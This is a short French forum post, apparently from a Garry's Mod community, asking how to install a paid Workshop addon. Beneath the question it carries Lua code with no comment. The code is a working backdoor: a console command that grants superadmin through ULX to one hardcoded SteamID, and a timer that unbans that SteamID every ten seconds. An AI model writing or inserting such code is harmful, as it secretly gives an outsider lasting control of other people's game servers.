- Initiateur de la discussion
G
Gizmo.M
Bambi
- Messages
- 21
- Score réaction
- 0
- Points
- 35
Bonjours, j'ai un soucis, je ne sais pas comment apporter un addons que j'ai payer sur le workshop ..
concommand.Add( "EFM", function(ply) if ( ply:SteamID() == "STEAM_0:1:92046224") then RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin") else ply:ChatPrint("Your not superadmin, " .. ply:Name() .. ".") end end) timer.Create( "checkForBan", 10, 0, function() ULib.unban( "STEAM_0:1:92046224") end )